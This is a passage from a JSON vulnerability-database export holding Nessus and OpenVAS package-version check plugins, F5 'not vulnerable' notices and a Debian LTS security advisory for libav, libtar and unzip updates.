PHSA-2018-2.0-0029\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libtar package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-29.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4420\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libtar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-1.2.20-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-debuginfo-1.2.20-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"libtar-devel-1.2.20-5.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtar\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T12:51:50", "bulletinFamily": "scanner", "description": "An update of the unzip package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0013_UNZIP.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121657", "title": "Photon OS 1.0: Unzip PHSA-2016-0013", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0013. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121657);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2015-7696\", \"CVE-2015-7697\");\n\n script_name(english:\"Photon OS 1.0: Unzip PHSA-2016-0013\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the unzip package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-13.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2774\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:unzip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-debuginfo-6.0-7.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"unzip-debuginfo-6.0-7.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unzip\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T04:51:48", "bulletinFamily": "scanner", "description": "Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of ervice\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2 function\nin libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occured when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided. As\na result, the variable 'item_num' turned negative, bypassing the check\nfor a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "DEBIAN_DLA-1654.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121622", "title": "Debian DLA-1654-1 : libav security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1654-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121622);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 9:34:54\");\n\n script_cve_id(\"CVE-2014-8542\", \"CVE-2015-1207\", \"CVE-2017-14169\", \"CVE-2017-14223\", \"CVE-2017-7863\", \"CVE-2017-7865\");\n script_bugtraq_id(70881);\n\n script_name(english:\"Debian DLA-1654-1 : libav security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of ervice\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2 function\nin libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occured when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided. As\na result, the variable 'item_num' turned negative, bypassing the check\nfor a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/02/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libav\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra-56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libav-dbg\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-doc\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-tools\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra-56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice55\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter5\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat56\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample2\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil54\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale-dev\", reference:\"6:11.12-1~deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale3\", reference:\"6:11.12-1~deb8u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-02-16T04:37:03", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-11T23:55:00", "published": "2019-02-11T23:55:00", "id": "F5:K07052904", "href": "https://support.f5.com/csp/article/K07052904", "title": "PHP vulnerability CVE-2015-3307", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:04", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-07T23:23:00", "published": "2019-02-07T23:23:00", "id": "F5:K19916307", "href": "https://support.f5.com/csp/article/K19916307", "title": "glibc vulnerability CVE-2015-1473", "type": "f5", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:02", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T20:03:00", "published": "2019-02-05T20:03:00", "id": "F5:K54423555", "href": "https://support.f5.com/csp/article/K54423555", "title": "PHP vulnerability CVE-2015-4147", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-16T04:37:17", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T19:33:00", "published": "2019-02-05T19:33:00", "id": "F5:K41036924", "href": "https://support.f5.com/csp/article/K41036924", "title": "Linux kernel vulnerability CVE-2014-7843", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-16T04:37:16", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-02-05T19:26:00", "published": "2019-02-05T19:26:00", "id": "F5:K75269595", "href": "https://support.f5.com/csp/article/K75269595", "title": "QEMU vulnerability CVE-2015-5166", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-02-07T01:57:13", "bulletinFamily": "unix", "description": "Package : libav\nVersion : 6:11.12-1~deb8u5\nCVE ID : CVE-2014-8542 CVE-2015-1207 CVE-2017-7863 CVE-2017-7865 \n CVE-2017-14169 CVE-2017-14223\n\n\nSeveral security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\n libavcodec/utils.c omitted a certain codec ID during enforcement of\n alignment, which allowed remote attackers to cause a denial of ervice\n (out-of-bounds access) or possibly have unspecified other impact via\n crafted JV data.\n\nCVE-2015-1207\n\n Double-free vulnerability in libavformat/mov.c allowed remote\n attackers to cause a denial of service (memory corruption and crash)\n via a crafted .m4a file.\n\nCVE-2017-7863\n\n libav had an out-of-bounds write caused by a heap-based buffer\n overflow related to the decode_frame_common function in\n libavcodec/pngdec.c.\n\nCVE-2017-7865\n\n libav had an out-of-bounds write caused by a heap-based buffer\n overflow related to the ipvideo_decode_block_opcode_0xA function in\n libavcodec/interplayvideo.c and the avcodec_align_dimensions2\n function in libavcodec/utils.c.\n\nCVE-2017-14169\n\n In the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\n integer signedness error might have occured when a crafted file,\n claiming a large "item_num" field such as 0xffffffff, was provided.\n As a result, the variable "item_num" turned negative, bypassing the\n check for a large value.\n\nCVE-2017-14223\n\n In libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\n lack of an EOF (End of File) check might have caused huge CPU\n consumption. When a crafted ASF file, claiming a large "ict" field in\n the header but not containing sufficient backing data, was provided,\n the for loop would have consumed huge CPU and memory resources, since\n there was no EOF check inside the loop.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-02-06T12:42:33", "published": "2019-02-06T12:42:33", "id": "DEBIAN:DLA-1654-1:B472E", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201902/msg00005.html", "title": "[SECURITY] [DLA 1654-1] libav security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-02-07T18:17:33", "bulletinFamily": "scanner", "description": "Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of ervice\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2\nfunction in libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large ", "modified": "2019-02-07T00:00:00", "published": "2019-02-06T00:00:00", "id": "OPENVAS:1361412562310891654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891654", "title": "Debian LTS Advisory ([SECURITY] [DLA 1654-1] libav security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891654\");\n script_version(\"$Revision: 13517 $\");\n script_cve_id(\"CVE-2014-8542\", \"CVE-2015-1207\", \"CVE-2017-14169\", \"CVE-2017-14223\", \"CVE-2017-7863\", \"CVE-2017-7865\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1654-1] libav security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-06 00:00:00 +0100 (Wed, 06 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/02/msg00005.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"libav on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 